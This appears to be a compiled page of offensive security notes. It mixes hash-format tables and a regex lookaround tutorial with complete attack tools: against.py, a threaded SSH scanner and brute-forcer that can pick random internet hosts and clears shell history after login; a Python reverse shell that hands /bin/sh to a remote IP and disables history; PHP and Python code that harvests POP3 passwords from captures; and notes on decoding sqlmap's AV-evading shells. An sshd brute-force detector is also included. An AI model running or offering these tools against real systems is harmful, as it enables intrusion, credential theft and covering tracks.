Post-exploitation checklists from room362.com: room362.com

Linux/UNIX/BSD post-exploitation: http://bit.ly/pqJxA5

Windows post-exploitation: http://bit.ly/lem7gvG

OSX post-exploitation: http://bit.ly/leR3cbz

Metasploit post-exploitation: http://bit.ly/JpJ1TR

http://blog.csdn.net/lxcnn/article/details/4304754

(?<=Expression)  positive lookbehind: the text to the left of the current position must match Expression

(?<!Expression)  negative lookbehind: the text to the left of the current position must not match Expression

(?=Expression)   positive lookahead: the text to the right of the current position must match Expression

(?!Expression)   negative lookahead: the text to the right of the current position must not match Expression

Lookaround is one of the harder parts of regular expressions. It can be approached from usage or from how the engine matches; the engine view gives the clearer and deeper picture, see "NFA engine matching principles" for the basics.

As noted above, a lookaround attaches a condition to a position in the subject string and consumes no characters. The difficulty is pinning down which position that is; once that is clear there is nothing mysterious left about lookaround.

Lookahead matching process

For positive lookahead (?=Expression): when the subexpression Expression matches, (?=Expression) succeeds and reports a zero-width match at the current position.

For negative lookahead (?!Expression): when Expression matches, (?!Expression) fails; when Expression fails to match, (?!Expression) succeeds and reports a zero-width match at the current position.

Source: wooyun.org

System: DES (Unix)

Example: IvS7aeT4NzQPM

Notes: Linux and other Unix-like systems (traditional crypt(3))

Length: 13 characters

Description: the first 2 characters are the salt ('Iv' in the example); the remaining 11 are the hash

System: MD5 (Unix)

Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/

Notes: Linux and other Unix-like systems

Length: 34 characters with an 8-character salt

Description: the leading $1$ is the algorithm identifier, the up to 8 characters before the next $ (12345678 here) are the salt, and the remaining 22 characters are the hash

Algorithm: md5crypt, whose main loop runs 1000 iterations of MD5 over mixes of password and salt

For example:

Hash: $1$73$aCtXgEDmSyXAyRHJ.87e.0

Plaintext: r9n3d2p6

This is the Unix md5crypt format: $1$ is the identifier, 73 is the salt, and aCtXgEDmSyXAyRHJ.87e.0 is the salted hash.

It can be reproduced on Linux with openssl: openssl passwd -1 -salt 73 r9n3d2p6

In PHP the crypt() function produces the same format: http://php.net/manual/en/function.crypt.php

cmd5 appears to support md5crypt only with 8-character salts, so for other salt lengths you have to run JtR or similar yourself; as it is MD5-based it cracks quickly.

System: SHA-512 (Unix)

Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm (the example is cut short; a complete hash field is 86 characters)

Notes: Linux and other Unix-like systems

Length: 98 characters with an 8-character salt ($6$ + salt + $ + 86-character hash)

Description: the leading $6$ is the algorithm identifier, followed by the salt (up to 16 characters), then the hash

Algorithm: sha512crypt, 5000 rounds of SHA-512 by default; a rounds=N$ field between $6$ and the salt overrides the count

System: SHA-256 (Unix)

Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi (the example is cut short; a complete hash field is 43 characters)

Notes: Linux and other Unix-like systems

Length: 55 characters with an 8-character salt ($5$ + salt + $ + 43-character hash)

Description: the leading $5$ is the algorithm identifier, followed by the salt (up to 16 characters), then the hash

Algorithm: sha256crypt, 5000 rounds of SHA-256 by default, same rounds=N$ override as above

System: MD5 (APR)

Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.

Notes: Apache htpasswd files (the apr1 variant of md5crypt), on any platform Apache runs on

Length: 37 characters with an 8-character salt

Description: the leading $apr1$ is the identifier, followed by the up to 8-character salt, then the 22-character hash

Algorithm: the md5crypt construction with the magic string changed to $apr1$, 1000 iterations of MD5

----------------- windows ------------------------------------------

System: Windows (cached domain credentials, MS Cache v1 / mscash)

Example: Admin:b474d48cdfc4974d86ef4d24904cdd91

Length: 32 hex characters (16 bytes), stored together with the username that is mixed into the hash

Algorithm: MD4(MD4(Unicode($pass)) . Unicode(strtolower($username))), i.e. the NT hash of the password followed by the UTF-16LE lowercased username, hashed again with MD4. A plain NT (NTLM) hash is just MD4(Unicode($pass)) and has the same 32-hex-character length, so the username in the record is what tells the two apart.

------------------ mysql --------------------------------------------

System: MySQL (pre-4.1)

Example: 606717496665bcba

Notes: PASSWORD() in old MySQL versions (before 4.1)

Length: 8 bytes (16 hex characters)

Description: two 32-bit words, each masked to at most 0x7fffffff, so the first hex digit of each 8-character half is always 0-7

System: MySQL 4.1+ / MySQL5

Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40

Notes: newer MySQL versions

Length: 20 bytes (40 hex characters), written with a leading asterisk

Algorithm: SHA-1(SHA-1($pass)), printed as uppercase hex with a * prefix

------------------ other systems -----------------------------------

System: MD5 (WordPress)

Example: $P$B123456780BhGFYSlUqGyE6ErKErL01

Notes: the phpass portable hash used by WordPress

Length: 34 characters

Description: $P$ identifies the hash type; the next character encodes the iteration count (usually 'B'), followed by an 8-character salt and then the hash

Algorithm: 8192 iterations of MD5. The count character is an index into the phpass alphabet ./0-9A-Za-z and the round count is 2 to that power: 'B' is index 13, so 2^13 = 8192

System: MD5 (phpBB3)

Notes: used by phpBB 3.x.x

Example: $H$9123456785DAERgALpsri.D9z3ht120

Length: 34 characters

Description: the leading $H$ is the identifier, followed by one count character (usually '9'), then the 8-character salt, then the hash

Algorithm: 2048 iterations of MD5 ('9' is index 11 in the same alphabet, 2^11 = 2048); apart from the prefix it is the same phpass construction as the WordPress hash

System: RAdmin v2.x

Notes: Remote Administrator v2.x

Example: 5e32cceaafed5cc80866737dfb212d7f

Length: 16 bytes (32 hex characters)

Algorithm: the password is zero-padded to 100 bytes and the padded buffer is hashed with MD5 (32 hex characters)

------------------------ md5 variants --------------------------------------

Plain MD5

Example: c4ca4238a0b923820dcc509a6f75849b

Used by: phpBB v2.x, Joomla before 1.0.13, and many other CMSes

Length: 32 hex characters (16 bytes)

The salted and nested variants follow the same pattern (written hash:salt in the examples):

md5($pass.$salt)

Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234

md5($salt.$pass)

Example: f190ce9ac8445d249747cab7be43f7d5:12

md5(md5($pass))

Example: 28c8edde3d61a0411511d3b1866f0636

md5(md5($pass).$salt)

Example: 6011527690eddca23580955c216b1fd2:wQ6

md5(md5($salt).md5($pass))

Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S

md5(md5($salt).$pass)

Example: 816a14db44578f516cbaef25bd8d8296:1234

md5($salt.$pass.$salt)

Example: a3bc9e11fddf4fef4deea11e33668eab:1234

md5($salt.md5($salt.$pass))

Example: 1d715e52285e5a6b546e442792652c8a:1234

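To make the format table above checkable, here is an added Python example (not part of the wooyun notes) that classifies a hash string by the prefixes and field lengths listed, decodes the phpass round-count character, and computes the two MySQL PASSWORD() variants. The format names, the sha-crypt rounds= field and the pre-4.1 MySQL routine are the documented algorithms; the truncated $5$/$6$ examples from the page deliberately come back as unrecognised.

```python
import hashlib
import re
from typing import Optional

# phpass alphabet: the character after $P$ / $H$ is an index into it and the
# round count is 2**index ('B' -> 13 -> 8192, '9' -> 11 -> 2048)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
B64 = r"[./0-9A-Za-z]"                  # crypt(3) base64 alphabet
SHACRYPT_HASH_LEN = {"5": 43, "6": 86}  # hash field length for sha256crypt / sha512crypt


def identify(h: str) -> Optional[dict]:
    """Classify a hash string by the formats listed above.

    Returns a dict with 'name' plus 'salt' / 'rounds' where the format
    carries them, or None when the string fits none of them (which is
    what happens with the truncated $5$ / $6$ examples on the page).
    """
    m = re.fullmatch(rf"\$(1|apr1)\$([^$]{{1,8}})\$({B64}{{22}})", h)
    if m:
        name = "md5crypt" if m[1] == "1" else "apr1 (htpasswd md5crypt)"
        return {"name": name, "salt": m[2], "rounds": 1000}

    m = re.fullmatch(rf"\$(5|6)\$(?:rounds=(\d+)\$)?([^$]{{1,16}})\$({B64}+)", h)
    if m:
        if len(m[4]) != SHACRYPT_HASH_LEN[m[1]]:
            return None  # wrong hash length: truncated, or not sha-crypt at all
        return {"name": "sha256crypt" if m[1] == "5" else "sha512crypt",
                "salt": m[3], "rounds": int(m[2]) if m[2] else 5000}

    m = re.fullmatch(rf"\$(P|H)\$({B64})({B64}{{8}})({B64}{{22}})", h)
    if m:
        return {"name": "phpass (WordPress)" if m[1] == "P" else "phpass (phpBB3)",
                "salt": m[3], "rounds": 2 ** ITOA64.index(m[2])}

    if re.fullmatch(r"\*[0-9A-Fa-f]{40}", h):
        return {"name": "MySQL 4.1+ (SHA1(SHA1(pass)))"}

    if re.fullmatch(r"[0-9A-Fa-f]{16}", h):
        # two 32-bit words, each masked to 31 bits, so both halves are <= 0x7fffffff
        if all(int(h[i:i + 8], 16) <= 0x7FFFFFFF for i in (0, 8)):
            return {"name": "MySQL pre-4.1"}
        return None

    if re.fullmatch(r"[0-9A-Fa-f]{32}", h):
        # raw MD5, NT hash and MS-Cache (DCC) all look like this: the context decides
        return {"name": "32 hex chars: raw MD5 / NT hash / mscash (ambiguous)"}

    if re.fullmatch(rf"{B64}{{13}}", h):
        return {"name": "DES crypt", "salt": h[:2]}

    return None


def mysql41_password(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by uppercase hex of SHA1(SHA1(pass))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mysql_old_password(password: str) -> str:
    """Pre-4.1 MySQL PASSWORD(): two 31-bit words as 16 hex chars; spaces and tabs are skipped."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password:
        if ch in " \t":
            continue
        c = ord(ch)
        nr = (nr ^ ((((nr & 63) + add) * c) + ((nr << 8) & 0xFFFFFFFF))) & 0xFFFFFFFF
        nr2 = (nr2 + (((nr2 << 8) & 0xFFFFFFFF) ^ nr)) & 0xFFFFFFFF
        add += c
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


if __name__ == "__main__":
    for sample in ("IvS7aeT4NzQPM", "$1$73$aCtXgEDmSyXAyRHJ.87e.0",
                   "$P$B123456780BhGFYSlUqGyE6ErKErL01",
                   "$6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm",
                   "*E6CC90B878B948C35E92B003C792C46C58C4AF40"):
        print(sample, "->", identify(sample))
    print(mysql41_password("password"), mysql_old_password("password"))
```

Run it on a dumped hash before picking a JtR or hashcat mode: the 32-hex-character case is the one where the classifier cannot help and the source of the dump has to decide.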
Source: https://github.com/nullsecuritynet/tools/blob/master/cracker/against/release/against.py

#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# against.py - mass scanning and brute-forcing script for ssh                  #
#                                                                              #
# FILE                                                                         #
# against.py                                                                   #
#                                                                              #
# DATE                                                                         #
# 2014-02-27                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# 'against.py' is a very fast ssh attacking script which includes a            #
# multithreaded port scanning module (tcp connect) for discovering possible    #
# targets and a multithreaded brute-forcing module which attacks               #
# parallel all discovered hosts or given ip addresses from a list.             #
#                                                                              #
# AUTHOR                                                                       #
# pgt - http://www.nullsecurity.net/                                           #
#                                                                              #
# TODO                                                                         #
# - keyboard-interactive handler                                               #
# - scan ip address ranges randomly                                            #
#                                                                              #
# CHANGELOG                                                                    #
# v0.2                                                                         #
# - prints kernel version after login                                          #
# - optimized timings when cracking                                            #
# - detection for key authentication                                           #
# - false positive / small honeypot detection                                  #
# - save found target ip addresses to file, -O option                          #
# - 127.x.x.x will be excluded when scanning for random ip addresses           #
# - unsort found target ip addresses, because of sequential port scanning      #
# - resolve ip address by given hostname                                       #
# - stop attacks on target when keyboard-interactive is required               #
# - set threads for port scanning, -s option                                   #
#                                                                              #
################################################################################


from socket import *
import multiprocessing
import threading
import time
import paramiko
import sys
import os
import logging
import argparse
import random
import re


# version of against.py
VERSION = 'v0.2'


# print our nice banner ;)
def banner():
    print '--==[ against.py by [email protected] ]==--'

# print version
def version():
    print '[+] against.py %s' % (VERSION)
    sys.exit(0)

# check if we can write to file
def test_file(filename):
    try:
        outfile = open(filename, 'a')
        outfile.close()
    except IOError:
        print '[!] ERROR: cannot write to file \'%s\'' % filename
        sys.exit(1)

# define command line parameters and help page
def argspage():
    parser = argparse.ArgumentParser(
    usage = '\n\n   ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
    formatter_class = argparse.RawDescriptionHelpFormatter,
    epilog =
    'examples:\n\n'

    '  attack single target\n'
    '  usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n'

    '  scanning and attacking an ip-range\n'
    '  usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500',
    add_help = False
    )

    options = parser.add_argument_group('options', '')
    options.add_argument('-i', default=False, metavar='<ip/range>',
            help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)')
    options.add_argument('-I', default=False, metavar='<file>',
            help='list of targets')
    options.add_argument('-r', default=False, metavar='<num>',
            help='attack random hosts')
    options.add_argument('-p', default=22, metavar='<num>',
            help='port number of sshd (default: 22)')
    options.add_argument('-t', default=4, metavar='<num>',
            help='threads per host (default: 4)')
    options.add_argument('-f', default=8, metavar='<num>',
            help='attack max hosts parallel (default: 8)')
    options.add_argument('-u', default='root', metavar='<username>',
            help='single username (default: root)')
    options.add_argument('-U', default=False, metavar='<file>',
            help='list of usernames')
    options.add_argument('-l', default='toor', metavar='<password>',
            help='single password (default: toor)')
    options.add_argument('-L', default=False, metavar='<file>',
            help='list of passwords')
    options.add_argument('-o', default=False, metavar='<file>',
            help='write found logins to file')
    options.add_argument('-O', default=False, metavar='<file>',
            help='write found target ip addresses to file')
    options.add_argument('-s', default=200, metavar='<num>',
            help='threads when port scanning (default: 200)')
    options.add_argument('-T', default=3, metavar='<sec>',
            help='timeout in seconds (default: 3)')
    options.add_argument('-V', action='store_true',
            help='print version of against.py and exit')

    args = parser.parse_args()

    if args.V:
        version()

    if (args.i == False) and (args.I == False) and (args.r == False):
        print ''
        parser.print_help()
        sys.exit(0)

    return args

# write found ip addresses / logins to file
def write_to_file(filename, text):
    outfile = open(filename, 'a')
    outfile.write(text)
    outfile.close()

# connect to target and checks for an open port
def scan(target, port, timeout, oips):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(timeout)
    result = sock.connect_ex((target, port))
    sock.close()
    if result == 0:
        HOSTLIST.append(target)
        if oips:
            write_to_file(oips, target + '\n')

# control the maximum number of threads
def active_threads(threads, waittime):
    while threading.activeCount() > threads:
        time.sleep(waittime)

# create thread and call scan()
def thread_scan(args, target):
    port = int(args.p)
    timeout = float(args.T)
    oips = args.O
    threads = int(args.s)

    bam = threading.Thread(target=scan, args=(target, port, timeout, oips))
    bam.start()

    active_threads(threads, 0.0001)
    time.sleep(0.001)

# only the output when scanning for targets
def scan_output(i):
    sys.stdout.flush()
    sys.stdout.write('\r[*] hosts scanned: {0} | ' \
            'possible to attack: {1}'.format(i, len(HOSTLIST)))

# handle format of given target(s)
def check_targets(targets):
    if re.match(r'^[0-9.\-]*$', targets):
        return targets
    try:
        target = gethostbyname(targets)
        return target
    except gaierror:
        print '[-] \'%s\' is unreachable' % (targets)
        finished()
        sys.exit(1)

# unsort found hosts, because of incremental scanning
def unsort_hostlist():
    print '[*] unsort host list'
    for i in range(15):
        random.shuffle(HOSTLIST)

# handle ip range format from command line
def handle_ip_range(iprange):
    parted = tuple(part for part in iprange.split('.'))

    rsa = range(4)
    rsb = range(4)
    for i in range(4):
        hyphen = parted[i].find('-')
        if hyphen != -1:
            rsa[i] = int(parted[i][:hyphen])
            rsb[i] = int(parted[i][1+hyphen:]) + 1
        else:
            rsa[i] = int(parted[i])
            rsb[i] = int(parted[i]) + 1

    return (rsa, rsb)

# call thread_scan() with target ip addresses
def ip_range(args):
    targets = check_targets(args.i)
    rsa, rsb = handle_ip_range(targets)

    print '[*] scanning %s for ssh services' % targets
    counter = 0
    for i in range(rsa[0], rsb[0]):
        for j in range(rsa[1], rsb[1]):
            for k in range(rsa[2], rsb[2]):
                for l in range(rsa[3], rsb[3]):
                    target = '%d.%d.%d.%d' % (i, j, k, l)
                    counter += 1
                    scan_output(counter)
                    thread_scan(args, target)

    # waiting for the last running threads
    active_threads(1, 0.1)

    scan_output(counter)
    print '\n[*] finished scan'

# create a random ip address, re-rolling instead of returning a 127.x.x.x one
def randip():
    rand = range(4)
    for i in range(4):
        rand[i] = random.randrange(0, 256)

    # exclude 127.x.x.x (the original called randip() here but dropped its result)
    if rand[0] == 127:
        return randip()

    ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3])
    return ipadd

# create random ip addresses
def rand_ip(args):
    i = 0
    print '[*] scanning random ips for ssh services'
    while len(HOSTLIST) < int(args.r):
        i += 1
        scan_output(i)
        thread_scan(args, randip())

    # waiting for the last running threads
    active_threads(1, 1)

    scan_output(i)
    print '\n[*] finished scan.'

# checks if given filename by parameter exists
def file_exists(filename):
    try:
        open(filename).readlines()
    except IOError:
        print '[!] ERROR: cannot open file \'%s\'' % filename
        sys.exit(1)

# read-in a file with ip addresses
def ip_list(ipfile):
    file_exists(ipfile)
    targets = open(ipfile).readlines()
    for target in targets:
        HOSTLIST.append(target)

# connect to target and try to login
def crack(target, port, user, passwd, outfile, timeo, i):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    user = user.replace('\n', '')
    passwd = passwd.replace('\n', '')
    try:
        ssh.connect(target, port=port, username=user, password=passwd,
                timeout=timeo, pkey=None, allow_agent=False)
        time.sleep(3)
        try:
            ssh.exec_command('unset HISTFILE ; unset HISTSIZE')
            time.sleep(1)
            ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \
                    '|| cat /proc/version')
            output = 'kernel: %s' \
                    % (ssh_stdout.readlines()[0].replace('\n', ''))
        except:
            output = 'info: maybe a honeypot or false positive'
        login = '[+] login found for %s | %s:%s\n' \
                '[!] %s' % (target, user, passwd, output)
        print login
        if outfile:
            write_to_file(outfile, login + '\n')
        ssh.close()
        os._exit(0)
    except paramiko.AuthenticationException, e:
        ssh.close()
        exception = str(e)
        if '[\'publickey\']' in exception:
            print '[-] key authentication only - ' \
                'stopped attack against %s' % (target)
            os._exit(1)
        elif '\'keyboard-interactive\'' in exception:
            print '[-] %s requires \'keyboard-interactive\' handler' % (target)
            os._exit(1)
    except:
        ssh.close()
        # after 3 timeouts per request the attack against $target will stopped
        if i < 3:
            i += 1
            # reconnect after random seconds (between 0.6 and 1.2 sec)
            randtime = random.uniform(0.6, 1.2)
            time.sleep(randtime)
            crack(target, port, user, passwd, outfile, timeo, i)
        else:
            print '[-] too many timeouts - stopped attack against %s' % (target)
            os._exit(1)

# create 'x' number of threads and call crack()
def thread_it(target, args):
    port = int(args.p)
    user = args.u
    userlist = args.U
    password = args.l
    passlist = args.L
    outfile = args.o
    timeout = float(args.T)
    threads = int(args.t)

    if userlist:
        users = open(userlist).readlines()
    else:
        users = [user]
    if passlist:
        passwords = open(passlist).readlines()
    else:
        passwords = [password]

    # try/except looks dirty but we need it :/
    try:
        for user in users:
            for password in passwords:
                Run = threading.Thread(target=crack, args=(target, port, user,
                    password, outfile, timeout, 0,))
                Run.start()
                # checks that we a max number of threads
                active_threads(threads, 0.01)
                time.sleep(0.1)
        # waiting for the last running threads
        active_threads(1, 1)
    except KeyboardInterrupt:
        os._exit(1)

# create 'x' child processes (child == cracking routine for only one target)
def fork_it(args):
    threads = int(args.t)
    childs = int(args.f)
    len_hosts = len(HOSTLIST)

    print '[*] attacking %d target(s)\n' \
            '[*] cracking up to %d hosts parallel\n' \
            '[*] threads per host: %d' % (len_hosts, childs, threads)

    i = 1
    for host in HOSTLIST:
        host = host.replace('\n', '')
        print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
        hostfork = multiprocessing.Process(target=thread_it, args=(host, args))
        hostfork.start()
        # checks that we have a max number of childs
        while len(multiprocessing.active_children()) >= childs:
            time.sleep(0.001)
        time.sleep(0.001)
        i += 1

    # waiting for child processes
    while multiprocessing.active_children():
        time.sleep(1)

# \(0.o)/
def empty_hostlist():
    if len(HOSTLIST) == 0:
        print '[-] found no targets to attack!'
        finished()
        sys.exit(1)

# output when against.py finished all routines
def finished():
    print '[*] game over!!!'

def main():
    banner()
    args = argspage()

    if args.U:
        file_exists(args.U)
    if args.L:
        file_exists(args.L)
    if args.o:
        test_file(args.o)
    if args.O:
        test_file(args.O)

    if args.i:
        ip_range(args)
        unsort_hostlist()
    elif args.I:
        ip_list(args.I)
    else:
        rand_ip(args)

    time.sleep(0.1)
    empty_hostlist()
    fork_it(args)
    finished()

if __name__ == '__main__':
    HOSTLIST = []
    try:
        logging.disable(logging.CRITICAL)
        main()
    except KeyboardInterrupt:
        print '\nbye bye!!!'
        time.sleep(0.2)
        os._exit(1)

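Seen from the target, a run of against.py is a burst of "Failed password" lines from one source, possibly followed by an "Accepted" line once a guess lands. As an added example that is not part of against.py or the original notes, the detector below reads constructed sshd syslog lines (not from a real host) and raises one alert when a source reaches a failure threshold inside a sliding time window, and another if that same source then logs in. Threshold, window and the alert wording are my own choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd syslog lines (not from a real host): a password-guessing
# burst from one source that ends in an accepted login, plus unrelated noise.
SAMPLE_AUTH_LOG = """\
Feb 27 10:00:01 web1 sshd[2001]: Failed password for root from 203.0.113.7 port 51001 ssh2
Feb 27 10:00:01 web1 sshd[2002]: Failed password for root from 203.0.113.7 port 51002 ssh2
Feb 27 10:00:02 web1 sshd[2003]: Failed password for invalid user admin from 203.0.113.7 port 51003 ssh2
Feb 27 10:00:02 web1 sshd[2004]: Failed password for root from 203.0.113.7 port 51004 ssh2
Feb 27 10:00:03 web1 sshd[2005]: Accepted password for root from 203.0.113.7 port 51005 ssh2
Feb 27 10:00:05 web1 sshd[2006]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Feb 27 10:09:00 web1 sshd[2007]: Accepted publickey for alice from 198.51.100.9 port 40001 ssh2
"""

# OpenSSH's standard auth lines; "invalid user" appears when the account does not exist
SSHD_LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+")


def detect_bruteforce(log: str, threshold: int = 4, window_s: int = 60) -> list:
    """Return alert strings in log order.

    One alert when a source reaches `threshold` failed logins within a
    sliding `window_s`-second window, and one more if that same source
    later gets an 'Accepted' line: the sequence against.py produces when
    a guess lands. Threshold and window are tuning choices, not standards.
    """
    recent_failures = defaultdict(deque)  # ip -> failure timestamps still inside the window
    flagged = set()
    alerts = []
    for line in log.splitlines():
        m = SSHD_LINE.match(line)
        if not m:
            continue  # not an auth line, or a format this parser does not know
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog carries no year
        ip = m["ip"]
        window = recent_failures[ip]
        while window and (ts - window[0]).total_seconds() > window_s:
            window.popleft()  # drop failures that fell out of the window
        if m["outcome"] == "Failed":
            window.append(ts)
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(f"bruteforce {ip}: {len(window)} failures within {window_s}s")
        elif ip in flagged:
            alerts.append(f"success-after-bruteforce {ip}: {m['user']} via {m['method']}")
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert is the one worth paging on: a success from a source that was just guessing is far rarer than the guessing itself, and with against.py it is followed within seconds by `unset HISTFILE` and `uname -a` on the box.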
Source: https://github.com/dairoot/Shell-rebound/blob/master/back.py
http://www.mksec.net/nc.py

#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
back connect py version, only linux has the pty module
code by google security team
"""
import sys, os, socket, pty
shell = "/bin/sh"

def usage(name):
    print 'python reverse connector'
    print 'usage: %s <ip_addr> <port>' % name

def main():
    if len(sys.argv) != 3:
        usage(sys.argv[0])
        sys.exit()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((sys.argv[1], int(sys.argv[2])))
        print 'connect ok'
    except (socket.error, ValueError):
        print 'connect failed'
        sys.exit()
    # point stdin/stdout/stderr (inherited by the spawned shell) at the socket
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    # disable shell history so the session leaves nothing in ~/.*_history
    for var in ("HISTFILE", "HISTFILESIZE", "HISTSIZE", "HISTORY",
                "HISTSAVE", "HISTZONE", "HISTLOG", "HISTCMD"):
        os.unsetenv(var)
    os.putenv("HISTFILE", '/dev/null')
    os.putenv("HISTSIZE", '0')
    os.putenv("HISTFILESIZE", '0')
    # pty.spawn gives the remote side a real terminal, so su/sudo and line editing work
    pty.spawn(shell)
    s.close()

if __name__ == '__main__':
    main()
<?php
// Pull USER/PASS pairs out of a raw POP3 capture; this instance keeps only @gmail.com users
$f = file_get_contents('pop3.cap');
preg_match_all('#CAPA.*?(USER\x20[[:upper:][:lower:][:punct:]]+@gmail\.com).*?(PASS\x20[[:alnum:][:punct:]]+).*?STAT#ism', $f, $m);
list($user, $pass) = array($m[1], $m[2]);
$user = array_unique($user);   // keys are preserved, so $pass[$key] still lines up with its user
foreach ($user as $key => $u) {
    echo "--------------------#$key#--------------" . PHP_EOL;
    echo $u . PHP_EOL;
    echo $pass[$key] . PHP_EOL;
}
?>

The example above extracts the passwords of @gmail.com users; to extract e.g. @163.com users instead, replace the domain in the pattern.

You can of course also grep for the relevant strings while capturing,
or search the capture for them with tshark, Wireshark or similar tools.

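The four lookaround forms from the regex section earlier on this page, applied to the job the PHP one-liner does. This is an added Python example, not the page's code, run against a constructed POP3 transcript (not a real capture) whose greetings carry an APOP-style <timestamp@host> banner as in RFC 1939. It shows the bare USER/PASS extraction, the domain filter done with a lookbehind so it can be swapped for 163.com as the note says, and one pitfall: a negative lookbehind such as (?<!USER ) only guards the first character of a match, so (?<!\S) is needed to pin the match to the start of a token.

```python
import re

# Constructed POP3 transcript (not a real capture): client and server lines
# of three sessions as they would appear in a reassembled TCP payload. The
# greeting carries an APOP-style <timestamp@host> banner (RFC 1939).
SAMPLE_CAPTURE = (
    "+OK POP3 server ready <1896.697170952@pop.example.net>\r\n"
    "CAPA\r\n+OK\r\nUSER alice.w@gmail.com\r\n+OK\r\n"
    "PASS S3cret!pw\r\n+OK Logged in\r\nSTAT\r\n+OK 2 1024\r\n"
    "+OK POP3 server ready <1896.697170953@pop.example.net>\r\n"
    "CAPA\r\n+OK\r\nUSER bob@163.com\r\n+OK\r\n"
    "PASS hunter2\r\n+OK Logged in\r\nSTAT\r\n+OK 0 0\r\n"
    "+OK POP3 server ready <1896.697170954@pop.example.net>\r\n"
    "CAPA\r\n+OK\r\nUSER alice.w@gmail.com\r\n+OK\r\n"
    "PASS wrongpw\r\n-ERR [AUTH] Authentication failed\r\n"
)

# (?<=USER )  positive lookbehind: "USER " must sit to the left of the match
#             but is not part of it, so the local part comes back bare.
# (?=@gmail\.com\r?$)  positive lookahead: the domain must follow, and is
#             likewise left out of the match.
GMAIL_LOCALPART = re.compile(r"(?<=USER )[^@\s]+(?=@gmail\.com\r?$)", re.M)

# (?!gmail\.com)  negative lookahead right after the '@': any other domain.
NON_GMAIL_USER = re.compile(r"(?<=USER )\S+@(?!gmail\.com)\S+")

# Positive lookbehind again: the password without the "PASS " keyword.
PASSWORD = re.compile(r"(?<=PASS )\S+")

# (?<!USER )  negative lookbehind: @-tokens that are *not* a USER argument,
#             i.e. the APOP banners. (?<!\S) pins the match to the start of a
#             token; without it the engine would start one byte later at
#             "lice.w@gmail.com", where the byte to the left is 'a', not "USER ".
OTHER_AT_TOKENS = re.compile(r"(?<!USER )(?<!\S)\S+@\S+")


def lookaround_demo(capture: str) -> dict:
    """Run the four lookaround patterns over a transcript and collect the hits."""
    return {
        "gmail_localparts": GMAIL_LOCALPART.findall(capture),
        "non_gmail_users": NON_GMAIL_USER.findall(capture),
        "passwords": PASSWORD.findall(capture),
        "other_at_tokens": OTHER_AT_TOKENS.findall(capture),
    }


def login_pattern(domain: str):
    """USER/PASS pair of one session together with the server's verdict on PASS.

    (?<=@<domain>) right after the user token is a positive lookbehind: the
    token must end in the wanted domain. Changing `domain` is the "replace
    @gmail.com with @163.com" step from the notes above.
    """
    dom = re.escape(domain)
    return re.compile(
        r"USER (?P<user>\S+)(?<=@" + dom + r")\r\n\+OK[^\r\n]*\r\n"
        r"PASS (?P<pw>\S+)\r\n(?P<reply>[+-](?:OK|ERR))")


def harvest_logins(capture: str, domain: str = "gmail.com") -> list:
    """Unique (user, password) pairs for `domain` whose PASS was answered +OK.

    Unlike the PHP one-liner this drops rejected passwords, so a wrong
    guess present in the capture does not end up in the result.
    """
    found = set()
    for m in login_pattern(domain).finditer(capture):
        if m["reply"] == "+OK":
            found.add((m["user"], m["pw"]))
    return sorted(found)


if __name__ == "__main__":
    for key, hits in lookaround_demo(SAMPLE_CAPTURE).items():
        print(f"{key}: {hits}")
    print(harvest_logins(SAMPLE_CAPTURE))
    print(harvest_logins(SAMPLE_CAPTURE, "163.com"))
```

Python's lookbehind must be fixed-width, which is why the domain check sits in a lookbehind built from an escaped literal while the variable-length part of the address is matched normally.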
The shells and some of the binaries shipped with sqlmap cannot be used as they are:
to keep them from being flagged by AV they are stored XOR-encoded.
Fortunately sqlmap ships the decoder:
./sqlmap/extra/cloak/cloak.py

For example lib_mysqludf_sys.dll (the UDF shipped with sqlmap is handy because AV rarely kills it):

